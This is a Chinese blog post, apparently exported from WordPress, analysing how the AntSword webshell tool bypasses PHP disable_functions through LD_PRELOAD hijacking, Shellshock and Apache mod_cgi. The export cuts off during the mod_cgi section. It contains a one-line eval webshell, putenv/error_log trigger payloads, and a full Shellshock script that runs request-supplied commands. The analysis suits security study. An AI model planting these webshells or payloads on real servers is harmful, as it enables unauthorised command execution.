{"id":475,"date":"2022-11-08T20:01:07","date_gmt":"2022-11-08T12:01:07","guid":{"rendered":"http:\/\/119.45.47.125\/?p=475"},"modified":"2022-11-10T22:27:46","modified_gmt":"2022-11-10T14:27:46","slug":"disable_functions-1","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2022\/11\/08\/disable_functions-1\/","title":{"rendered":"AntSword\u4e0edisable_functions\uff08\u4e00\uff09"},"content":{"rendered":"<h2>\u53c2\u8003\u6587\u7ae0<\/h2>\n<ul><li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/208451\" title=\"bypass disable_function\u591a\u79cd\u65b9\u6cd5+\u5b9e\u4f8b\">bypass disable_function\u591a\u79cd\u65b9\u6cd5+\u5b9e\u4f8b<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/yangyangwithgnu\/bypass_disablefunc_via_LD_PRELOAD\" title=\"bypass_disablefunc_via_LD_PRELOAD\">bypass_disablefunc_via_LD_PRELOAD<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/xz.aliyun.com\/t\/10057\" title=\"bypass disable_functions\u59ff\u52bf\u603b\u7ed3\">bypass disable_functions\u59ff\u52bf\u603b\u7ed3<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.freebuf.com\/web\/192052.html\" title=\"\u65e0\u9700sendmail\uff1a\u5de7\u7528LD_PRELOAD\u7a81\u7834disable_functions\">\u65e0\u9700sendmail\uff1a\u5de7\u7528LD_PRELOAD\u7a81\u7834disable_functions<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/blog.csdn.net\/qq_51770207\/article\/details\/126997602\" title=\"\u7ed5\u8fc7disable_function\">\u7ed5\u8fc7disable_function<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.mi1k7ea.com\/2019\/06\/02\/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-disable-functions%E7%9A%84%E6%96%B9%E6%B3%95\" title=\"\u6d45\u8c08\u51e0\u79cdBypass disable_functions\u7684\u65b9\u6cd5\">\u6d45\u8c08\u51e0\u79cdBypass disable_functions\u7684\u65b9\u6cd5<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/175403\" title=\"\u6df1\u5165\u6d45\u51faLD_PRELOAD &amp; putenv()\">\u6df1\u5165\u6d45\u51faLD_PRELOAD &amp; putenv()<\/a><\/li>\n<\/ul>\n<hr \/>\n<pre><code class=\"language-php line-numbers\">&lt;?php\n@eval($_REQUEST['ant']);\nshow_source(__FILE__);\n?&gt;\n<\/code><\/pre>\n<p>diasbale_functions:<code>cntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,system<\/code><\/p>\n<hr \/>\n<h2>1.LD_PRELOAD<\/h2>\n<hr \/>\n<h3>\u4f7f\u7528\u6761\u4ef6\uff1a<\/h3>\n<ul><li>Linux \u64cd\u4f5c\u7cfb\u7edf<\/li>\n<li><code>putenv<\/code><\/li>\n<li><code>mail<\/code> or <code>error_log<\/code> \u672c\u4f8b\u4e2d\u7981\u7528\u4e86 <code>mail<\/code> \u4f46\u672a\u7981\u7528 <code>error_log<\/code><\/li>\n<li>\u5b58\u5728\u53ef\u5199\u7684\u76ee\u5f55, \u9700\u8981\u4e0a\u4f20 <code>.so<\/code> \u6587\u4ef6<\/li>\n<\/ul>\n<h3>\u65b9\u6cd5\u539f\u7406\uff1a<\/h3>\n<p>\u539f\u7406\u53ef\u53c2\u8003 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/ctf-wiki.org\/reverse\/linux\/ld_preload\" title=\"CTF_Wiki\">CTF_Wiki<\/a> \u4e0a\u7684\u8868\u8ff0\uff0c\u4e2a\u4eba\u89c9\u5f97\u5199\u5f97\u6bd4\u8f83\u597d\u7684\u662f\u4e0b\u9762\u8fd9\u4e2a\uff0c\u51fa\u81ea<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/yangyangwithgnu\/bypass_disablefunc_via_LD_PRELOAD\" title=\"\u8fd9\u91cc\">\u8fd9\u91cc<\/a>\uff1a<\/p>\n<blockquote>\n  \u4e00\u822c\u800c\u8a00\uff0c\u5229\u7528\u6f0f\u6d1e\u63a7\u5236 web \u542f\u52a8\u65b0\u8fdb\u7a0b <code>a.bin<\/code>\uff08\u5373\u4fbf\u8fdb\u7a0b\u540d\u65e0\u6cd5\u8ba9\u6211\u968f\u610f\u6307\u5b9a\uff09\uff0c<code>a.bin<\/code>\u5185\u90e8\u8c03\u7528\u7cfb\u7edf\u51fd\u6570<code>b()<\/code>\uff0c<code>b()<\/code>\u4f4d\u4e8e\u7cfb\u7edf\u5171\u4eab\u5bf9\u8c61<code>c.so<\/code>\u4e2d\uff0c\u6240\u4ee5\u7cfb\u7edf\u4e3a\u8be5\u8fdb\u7a0b\u52a0\u8f7d<code>c.so<\/code>\uff0c\u60f3\u6cd5\u5728<code>c.so<\/code>\u524d\u4f18\u5148\u52a0\u8f7d\u53ef\u63a7\u7684<code>c_evil.so<\/code>\uff0c<code>c_evil.so<\/code>\u5185\u542b\u4e0e<code>b()<\/code>\u540c\u540d\u7684\u6076\u610f\u51fd\u6570\uff0c\u7531\u4e8e <code>c_evil.so<\/code>\u4f18\u5148\u7ea7\u8f83\u9ad8\uff0c\u6240\u4ee5\uff0c<code>a.bin<\/code>\u5c06\u8c03\u7528\u5230<code>c_evil.so<\/code>\u5185<code>b()<\/code>\u800c\u975e\u7cfb\u7edf\u7684<code>c.so<\/code>\u5185<code>b()<\/code>\uff0c\u540c\u65f6<code>c_evil.so<\/code>\u53ef\u63a7\uff0c\u8fbe\u5230\u6267\u884c\u6076\u610f\u4ee3\u7801\u7684\u76ee\u7684\n<\/blockquote>\n<p>\u6240\u4ee5\u7b2c\u4e00\u6b65\u5c31\u662f\u672c\u5730\u751f\u6210\u4e00\u4e2a<code>evil.so<\/code>\u6587\u4ef6\uff0c\u4e0a\u4f20\u5230\u670d\u52a1\u5668\uff0c\u5229\u7528<code>putenv()<\/code>\u51fd\u6570\uff0c\u5c06\u73af\u5883\u53d8\u91cf<code>LD_PRELOAD<\/code>\u8def\u5f84\u8bbe\u7f6e\u4e3a<code>evil.so<\/code>\uff0c\u6700\u540e\u518d\u5229\u7528 php \u7684\u67d0\u4e2a\u51fd\u6570\u53bb\u89e6\u53d1\uff0c\u800c\u4e14\u8fd9\u4e2a\u51fd\u6570\u9700\u8981\u80fd\u591f\u542f\u52a8\u65b0\u7684\u8fdb\u7a0b\uff1b<code>system()\/exec()\/shell_exec()\/mail()\/error_log()<\/code>\u90fd\u5c5e\u4e8e\u8fd9\u7c7b\u51fd\u6570<\/p>\n<p>\u5728 linux \u4e2d\uff0c\u8fdb\u7a0b\u7684\u4ea7\u751f\u901a\u5e38\u662f\u901a\u8fc7<code>fork<\/code>\u51fd\u6570\uff0c\u7531\u7236\u8fdb\u7a0b\u884d\u751f\u51fa\u4e00\u4e2a\u5b50\u8fdb\u7a0b\u4e14\u5927\u90e8\u5206\u7684\u8fdb\u7a0b\u5e76\u4e0d\u662f\u76f4\u63a5\u5728\u7236\u8fdb\u7a0b\u7684\u57fa\u7840\u4e0a\u8fd0\u884c\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u7528\u5230<code>exec<\/code>\u51fd\u6570\uff0c\u4e0d\u540c\u7684<code>exec<\/code>\u51fd\u6570\u5b9e\u9645\u4e0a\u90fd\u662f\u8c03\u7528\u4e86 glibc \u4e2d\u7684 <code>__execve<\/code> \u51fd\u6570\uff0c\u800c glibc \u4e2d\u7684<code>__execve<\/code>\u51fd\u6570\u5411\u5185\u6838\u53d1\u8d77<code>execve<\/code>\u7cfb\u7edf\u8c03\u7528<\/p>\n<p>\u4ee5<code>mail()<\/code>\u4e3a\u4f8b\uff0c\u5f53\u7528<code>strace -f<\/code>\u8ddf\u8e2a\u8fdb\u7a0b\u8c03\u7528\u7684\u5b50\u8fdb\u7a0b\u65f6\uff0c\u901a\u8fc7<code>grep execve<\/code>\u67e5\u770b\u542f\u52a8\u7684\u65b0\u8fdb\u7a0b<\/p>\n<pre><code class=\"language-shell line-numbers\">[root@VM-8-7-centos default]# strace -f php mail.php 2&gt;&amp;1 | grep execve\n\nexecve(\"\/usr\/bin\/php\", [\"php\", \"mail.php\"], 0x7ffc36464a10 \/* 24 vars *\/) = 0\n[pid 24498] execve(\"\/bin\/sh\", [\"sh\", \"-c\", \"\/usr\/sbin\/sendmail -t -i\"], 0x15c8010 \/* 24 vars *\/ &lt;unfinished ...&gt;\n[pid 24498] &lt;... execve resumed&gt;)       = 0\n[pid 24498] execve(\"\/usr\/sbin\/sendmail\", [\"\/usr\/sbin\/sendmail\", \"-t\", \"-i\"], 0x16e6360 \/* 23 vars *\/) = 0\n[pid 24499] execve(\"\/usr\/sbin\/postdrop\", [\"\/usr\/sbin\/postdrop\", \"-r\"], 0x560b6324a660 \/* 2 vars *\/) = 0\n<\/code><\/pre>\n<p>\u7b2c\u4e00\u4e2a\u662f\u542f\u52a8 php \u89e3\u91ca\u5668\uff0c\u540e\u9762\u7684<code>\/usr\/sbin\/sendmail<\/code>\u548c<code>\/usr\/sbin\/postdrop<\/code>\u662f\u65b0\u7684\u8fdb\u7a0b\uff0c<code>readelf -s \/usr\/sbin\/sendmail<\/code>\u53ef\u4ee5\u67e5\u770b\u8c03\u7528\u4e86\u54ea\u4e9b\u51fd\u6570<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_79b30e681c582544e28c52319215fee0.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_79b30e681c582544e28c52319215fee0.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5728\u52ab\u6301\u51fd\u6570\u7684\u9009\u62e9\u4e0a\uff0c\u5c3d\u91cf\u9009\u62e9\u91cd\u5199\u590d\u6742\u5ea6\u5c0f\u3001\u65e0\u53c2\u6570\u3001\u5e38\u7528\u7684\uff0c\u6bd4\u5982<code>getuid()<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/1-8-1024x396.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/1-8-1024x396.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5982\u4f55\u91cd\u5199\u53ef\u4ee5\u53c2\u8003\u4e0a\u8ff0\u6587\u7ae0\uff0c\u800c\u540e\u53ef\u4ee5\u5c06\u4e0a\u4f20\u8def\u5f84\u5199\u8fdb .php \u6587\u4ef6\u91cc,\u6700\u540e\u4e00\u5e76\u4e0a\u4f20\u81f3\u6709\u6743\u9650\u7684\u76ee\u5f55\u4e0b\uff0c\u6267\u884c .php \u5373\u53ef<\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\nputenv(\"LD_PRELOAD=.\/hack.so\"); \/\/ .so \u4e0a\u4f20\u8def\u5f84\nmail('','','',''); \/\/ \u5982\u679c mail() \u88ab\u5904\u7406\uff0c\u53ef\u4ee5\u4f7f\u7528 error_log('a',1);\n?&gt;\n<\/code><\/pre>\n<p>\u4f46\u662f\u8fd9\u662f\u7406\u60f3\u72b6\u6001\u4e0b\u7684\u52ab\u6301\uff0c\u52ab\u6301\u6210\u529f\u662f\u5efa\u7acb\u5728\u76ee\u6807\u73af\u5883\u4e0b\u6709<code>sendmail<\/code>\uff0c\u800c\u4e14\u53ef\u4ee5\u6267\u884c .php \u6587\u4ef6\u7684\u57fa\u7840\u4e0a<\/p>\n<p>\u6709\u7684\u65f6\u5019\u76ee\u6807\u73af\u5883\u53ef\u80fd\u6ca1\u6709\u5b89\u88c5<code>sendmail<\/code>\uff0c\u4e5f\u6ca1\u6709\u6743\u9650\u6267\u884c .php \u6587\u4ef6\uff0c\u8fd9\u79cd\u60c5\u51b5\u7684\u89e3\u51b3\u65b9\u6cd5\u53ef\u53c2\u8003 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.freebuf.com\/web\/192052.html\" title=\"\u65e0\u9700sendmail\uff1a\u5de7\u7528LD_PRELOAD\u7a81\u7834disable_functions\">\u65e0\u9700sendmail\uff1a\u5de7\u7528LD_PRELOAD\u7a81\u7834disable_functions<\/a>\uff0c\u7ec6\u8282\u4e0a\u5df2\u7ecf\u5199\u5f97\u975e\u5e38\u8be6\u7ec6\u4e86\uff0c\u5c06\u52ab\u6301\u67d0\u4e00\u51fd\u6570\u6269\u5c55\u5230\u52ab\u6301\u5171\u4eab\u5bf9\u8c61<\/p>\n<p>\u8681\u5251\u7ed5\u8fc7\u63d2\u4ef6\u7684\u505a\u6cd5\u662f\uff0c\u5728\u5f53\u524d\u76ee\u5f55\u4e0a\u4f20\u4e86\u4e00\u4e2a .antproxy.php \u6587\u4ef6\uff0c\u7136\u540e\u5728<code>\/tmp<\/code>\u4e0b\u4e0a\u4f20\u4e86\u4e00\u4e2a .so \u6587\u4ef6\uff0c\u6700\u540e\u66f4\u6539 shell \u5730\u5740\u4e3a<code>\/.antproxy.php<\/code>\u5c31\u53ef\u4ee5\u6267\u884c\u547d\u4ee4<\/p>\n<p>\u901a\u8fc7<code>ps -aef<\/code>\u67e5\u770b\u8fdb\u7a0b\u60c5\u51b5<\/p>\n<pre><code class=\"language-shell line-numbers\">www-data   148    32  0 Nov08 ?        00:00:00 \/bin\/sh -c php -n -S 127.0.0.1:64091 -t \/var\/www\/html\nwww-data   149   148  0 Nov08 ?        00:00:01 php -n -S 127.0.0.1:64091 -t \/var\/www\/html\nwww-data   150    27  0 Nov08 ?        00:00:00 \/usr\/sbin\/apache2 -k start\n<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u76ee\u6807\u73af\u5883\u53c8\u542f\u52a8\u4e86\u4e00\u4e2a\u65b0\u7684 php \u73af\u5883\uff0c\u800c\u4e14\u4e0d\u5e26 .ini\uff0c\u548c\u4ee3\u7801\u662f\u5bf9\u5e94\u7684<\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\n...\nset_time_limit(120);\n$headers=get_client_header();\n$host = \"127.0.0.1\";\n$port = 64091;\n$errno = '';\n$errstr = '';\n$timeout = 30;\n$url = \"\/index.php\";\n\nif (!empty($_SERVER['QUERY_STRING'])){\n    $url .= \"?\".$_SERVER['QUERY_STRING'];\n};\n\n$fp = fsockopen($host, $port, $errno, $errstr, $timeout);\nif(!$fp){\n    return false;\n}\n\n...\n?&gt;\n<\/code><\/pre>\n<p>\u5728<code>core\/ld_preload\/index.js<\/code>\u7684<code>exploit()<\/code>\u91cc\u4e5f\u53ef\u4ee5\u770b\u5230\u5b9e\u73b0\u7ec6\u8282<\/p>\n<pre><code class=\"language-javascript line-numbers\">let cmd = `${phpbinary} -n -S 127.0.0.1:${port} -t ${webrootdir}`;\nlet fileBuffer = self.generateExt(cmd);\nif (!fileBuffer) {\n    toastr.warning(LD_PRELOAD_LANG['msg']['genext_err'], LANG_T[\"warning\"]);\n    self.cell.progressOff();\n    return\n}\n<\/code><\/pre>\n<p>\u4e0a\u4f20<code>ext<\/code>\u540e\u4f1a\u89e6\u53d1 payload<\/p>\n<pre><code class=\"language-javascript line-numbers\">new Promise((res, rej) =&gt; {...\n }.then((p) =&gt; {\n        \/\/ \u89e6\u53d1 payload, \u4f1a\u8d85\u65f6\n        var payload = `error_reporting(E_ALL);putenv(\"LD_PRELOAD=${p}\");error_log(\"a\", 1);echo(1);`;\n        core.request({\n          _: payload,\n        }).then((response) =&gt; {\n\n        }).catch((err) =&gt; {\n          \/\/ \u8d85\u65f6\u4e5f\u662f\u6b63\u5e38\n        })\n      }).then(() =&gt; {\n        \/\/ \u9a8c\u8bc1\u662f\u5426\u6210\u529f\u5f00\u542f\n        var payload = `sleep(1);\n          $fp = @fsockopen(\"127.0.0.1\", ${port}, $errno, $errstr, 1);\n          if(!$fp){\n            echo(0);\n          }else{\n            echo(1);\n            @fclose($fp);\n          };`\n        core.request({\n          _: payload,\n        }).then((response) =&gt; {\n          var ret = response['text'];\n          if (ret === '1') {\n            toastr.success(LANG['success'], LANG_T['success']);\n            self.form.setItemLabel('status_label', `New WebServer Listen`);\n            self.form.setItemLabel('status_msg', `127.0.0.1:${port}`);\n            self.uploadProxyScript(\"127.0.0.1\", port);\n            self.cell.progressOff();\n          }\n<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u6700\u7ec8\u8d70\u7684\u4e5f\u662f<code>error_log()<\/code>\uff0c\u540c\u65f6\u5728<code>core\/base.js<\/code>\u4e0b\u67e5\u770b<code>generateExt()<\/code><\/p>\n<pre><code class=\"language-javascript line-numbers\">generateExt(cmd) {\n    let self = this;\n    let fileBuff = fs.readFileSync(self.ext_path);\n    let start = 0,\n      end = 0;\n    switch (self.ext_name) {\n      case 'ant_x86.so':\n        start = 275;\n        end = 504;\n        break;\n      case 'ant_x64.so':\n        \/\/ 434-665\n        start = 434;\n        end = 665;\n        break;\n      case 'ant_x86.dll':\n        start = 1544;\n        end = 1683;\n        break;\n      case 'ant_x64.dll':\n        start = 1552;\n        end = 1691;\n        break;\n      default:\n        break;\n    }\n    if (cmd.length &gt; (end - start)) {\n      return\n    }\n    fileBuff[end] = 0;\n    fileBuff.write(\"                    \", start);\n    fileBuff.write(cmd, start);\n    return fileBuff;\n  }\n<\/code><\/pre>\n<p>\u9884\u7559\u4e86\u53c2\u6570<code>cmd<\/code>\u7684\u4f4d\u7f6e\uff0c\u518d\u628a<code>ant_x86.dll<\/code>\u53cd\u4e00\u4e0b\u662f\u8fd9\u4e2a<\/p>\n<pre><code class=\"language-c line-numbers\">BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\n{\n  system(\n    \"[command                                                                                                            \"\n    \"                       ]\");\n  return 1;\n}\n<\/code><\/pre>\n<p>\u6240\u4ee5\u8681\u5251\u7a81\u7834\u7684\u6d41\u7a0b\u5c31\u5f88\u660e\u6670\u4e86\uff0c\u751f\u6210\u4e00\u4e2a <strong>\u542b\u53ef\u6267\u884c\u547d\u4ee4\u548c\u5f00\u542f\u65b0\u7684\u3001\u6ca1\u6709\u7279\u6b8a\u73af\u5883\u9650\u5236\u7684 php web server<\/strong> \u7684\u6269\u5c55\uff0c\u5229\u7528 .antproxy.php \u5b8c\u6210\u4ee3\u7406\u53d1\u9001\u6570\u636e\u5e76\u63a5\u6536\u8fd4\u56de\u4fe1\u606f<\/p>\n<hr \/>\n<h2>2.Shellshock(CVE-2014-6271)<\/h2>\n<hr \/>\n<h3>\u4f7f\u7528\u6761\u4ef6\uff1a<\/h3>\n<ul><li>Linux \u64cd\u4f5c\u7cfb\u7edf<\/li>\n<li><code>putenv<\/code><\/li>\n<li><code>mail<\/code> or <code>error_log<\/code> \u672c\u4f8b\u4e2d\u7981\u7528\u4e86 <code>mail<\/code> \u4f46\u672a\u7981\u7528 <code>error_log<\/code><\/li>\n<li><code>\/bin\/bash<\/code> \u5b58\u5728 <code>CVE-2014-6271<\/code> \u6f0f\u6d1e<\/li>\n<li><code>\/bin\/sh -&gt; \/bin\/bash<\/code> sh \u9ed8\u8ba4\u7684 shell \u662f bash<\/li>\n<\/ul>\n<h3>\u65b9\u6cd5\u539f\u7406\uff1a<\/h3>\n<p>\u6f0f\u6d1e\u539f\u7406\u4e0d\u518d\u8d58\u8ff0\uff0c\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\u6587\u7ae0<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.cnblogs.com\/qmfsun\/p\/7591757.html\" title=\"\u300aBash\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2014-6271)\u6848\u4f8b\u5206\u6790\u300b\">\u300aBash\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2014-6271)\u6848\u4f8b\u5206\u6790\u300b<\/a><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_7c0da8f480a01d23acc92ad1333bb0e0.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_7c0da8f480a01d23acc92ad1333bb0e0.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u800c<code>mail()\/error_log()<\/code>\u4e4b\u6240\u4ee5\u80fd\u591f\u7528\u6765\u7a81\u7834 disable_functions \u7684\u9650\u5236\uff0c\u6e90\u7801\u91cc\u5176\u5b9e\u5df2\u7ecf\u5199\u4e86\uff08\u6e90\u7801\u662f github \u4e0a\u6700\u65b0\u7248\u672c\u7684\uff09<\/p>\n<pre><code class=\"language-c line-numbers\">\/* basic_functions.c *\/\n\nPHPAPI int _php_error_log(int opt_err, const char *message, const char *opt, const char *headers) \/* {{{ *\/\n{\n    return _php_error_log_ex(opt_err, message, (opt_err == 3) ? strlen(message) : 0, opt, headers);\n}\n\/* }}} *\/\n\nPHPAPI int _php_error_log_ex(int opt_err, const char *message, size_t message_len, const char *opt, const char *headers) \/* {{{ *\/\n{\n    php_stream *stream = NULL;\n    size_t nbytes;\n\n    switch (opt_err)\n    {\n        case 1:     \/*send an email *\/\n            if (!php_mail(opt, \"PHP error_log message\", message, headers, NULL)) {\n                return FAILURE;\n            }\n            break;\n...\n<\/code><\/pre>\n<p>\u8fd9\u91cc\u5176\u5b9e\u5c31\u53ef\u4ee5\u770b\u51fa\u6765\u4e86\uff0c\u4e3a\u4ec0\u4e48\u5728\u8c03\u7528<code>error_log()<\/code>\u7a81\u7834\u65f6\u7b2c\u4e8c\u4e2a\u53c2\u6570\u8981\u8bbe\u7f6e\u4e3a 1<\/p>\n<pre><code class=\"language-c line-numbers\">\/* mail.c *\/\n\nPHPAPI int php_mail(const char *to, const char *subject, const char *message, const char *headers, const char *extra_cmd)\n{\n#ifdef PHP_WIN32\n    int tsm_err;\n    char *tsm_errmsg = NULL;\n#endif\n    FILE *sendmail;\n    int ret;\n    char *sendmail_path = INI_STR(\"sendmail_path\");\n    char *sendmail_cmd = NULL;\n    char *mail_log = INI_STR(\"mail.log\");\n    const char *hdr = headers;\n    char *ahdr = NULL;\n#if PHP_SIGCHILD\n    void (*sig_handler)() = NULL;\n#endif\n...\n\nif (extra_cmd != NULL) {\n        spprintf(&amp;sendmail_cmd, 0, \"%s %s\", sendmail_path, extra_cmd);\n    } else {\n        sendmail_cmd = sendmail_path;\n    }\n...\n\n#ifdef PHP_WIN32\n    sendmail = popen_ex(sendmail_cmd, \"wb\", NULL, NULL);\n#else\n    \/* Since popen() doesn't indicate if the internal fork() doesn't work\n     * (e.g. the shell can't be executed) we explicitly set it to 0 to be\n     * sure we don't catch any older errno value. *\/\n    errno = 0;\n    sendmail = popen(sendmail_cmd, \"w\");\n#endif\n    if (extra_cmd != NULL) {\n        efree (sendmail_cmd);\n    }\n<\/code><\/pre>\n<p>\u5f53<code>mail()<\/code>\u7684\u53c2\u6570<code>extra_cmd<\/code>\u5b58\u5728\u7684\u65f6\u5019\uff0c\u5148\u7528<code>spprintf()<\/code>\u63a5\u6536\u5408\u5e76\u540e\u7684\u547d\u4ee4\uff0c\u540e\u9762\u518d\u8c03\u7528<code>popen()<\/code>\u6d3e\u751f\u51fa\u8fdb\u7a0b\u6267\u884c\uff0c\u5982\u679c sh \u9ed8\u8ba4\u4e3a bash \u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u5229\u7528 Shellshock \u4e86<\/p>\n<p>\u90a3\u4e48\u8fd9\u4e2a\u65f6\u5019\u518d\u770b\u73af\u5883\u4e0b\u7ed9\u7684\u539f\u7406\u811a\u672c\u5c31\u53ef\u4ee5\u7406\u89e3\u4e86<\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\nfunction runcmd($c){\n  $d = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n  if(substr($d, 0, 1) == \"\/\" &amp;&amp; function_exists('putenv') &amp;&amp; (function_exists('error_log') || function_exists('mail'))){\n    if(strstr(readlink(\"\/bin\/sh\"), \"bash\")!=FALSE){\n      $tmp=tempnam(sys_get_temp_dir(), 'as');\n      putenv(\"PHP_LOL=() { x; }; $c &gt;$tmp 2&gt;&amp;1\");\n      if (function_exists('error_log')) {\n        error_log(\"a\", 1);\n      }else{\n        mail(\"a@127.0.0.1\", \"\", \"\", \"-bv\");\n      }\n    }else{\n      print(\"Not vuln (not bash)\\n\");\n    }\n    $output = @file_get_contents($tmp);\n    @unlink($tmp);\n    if($output!=\"\"){\n      print($output);\n    }else{\n      print(\"No output, or not vuln.\");\n    }\n  }else{\n    print(\"\u4e0d\u6ee1\u8db3\u4f7f\u7528\u6761\u4ef6\");\n  }\n}\n\n\/\/ runcmd(\"whoami\"); \/\/ \u8981\u6267\u884c\u7684\u547d\u4ee4\nruncmd($_REQUEST[\"cmd\"]); \/\/ ?cmd=whoami\n?&gt;\n<\/code><\/pre>\n<hr \/>\n<h2>3.Apache Mod CGI<\/h2>\n<hr \/>\n<blockquote>\n  \u76f8\u6bd4\u4e8e\u524d\u4e24\u4e2a\u73af\u5883\uff0cdisable_functions \u591a\u4e86<code>putenv()<\/code>\n<\/blockquote>\n<h3>\u4f7f\u7528\u6761\u4ef6\uff1a<\/h3>\n<ul><li>Linux \u64cd\u4f5c\u7cfb\u7edf<\/li>\n<li>Apache + PHP (apache \u4f7f\u7528 apache_mod_php)<\/li>\n<li>Apache \u5f00\u542f\u4e86 <code>cgi<\/code>, <code>rewrite<\/code><\/li>\n<li>Web \u76ee\u5f55\u7ed9\u4e86 <code>AllowOverride<\/code> \u6743\u9650<\/li>\n<li>\u5f53\u524d\u76ee\u5f55\u53ef\u5199<\/li>\n<\/ul>\n<h3>\u65b9\u6cd5\u539f\u7406\uff1a<\/h3>\n<p>\u5173\u4e8e CGI\uff0c\u767e\u5ea6\u767e\u79d1\u5c31\u53ef\u4ee5\u67e5\u5230\u5de5\u4f5c\u539f\u7406\uff0cApache 2.2 \u7684\u53c2\u8003\u624b\u518c\u4e5f\u6709\u76f8\u5173\u4ecb\u7ecd<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_3cdc7bc4f86ce69123dbfc8cdaf31c3b.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 